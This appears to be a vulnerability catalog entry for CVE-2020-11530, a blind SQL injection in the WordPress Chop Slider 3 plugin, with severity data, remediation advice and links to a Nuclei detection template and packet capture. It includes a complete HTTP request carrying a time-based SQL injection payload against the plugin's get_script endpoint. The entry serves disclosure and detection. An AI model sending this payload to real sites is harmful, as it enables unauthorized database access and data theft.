| Title | WordPress Chop Slider 3 - Blind SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. |
| Remediation | Update to the latest version of the WordPress Chop Slider 3 plugin to mitigate the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93134 |
| CVE ID | CVE-2020-11530 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2020 wpscan seclists sqli wordpress wp-plugin wp chopslider unauth idangero vkev vuln |
WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11530.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-11530.pcap
N/AN/A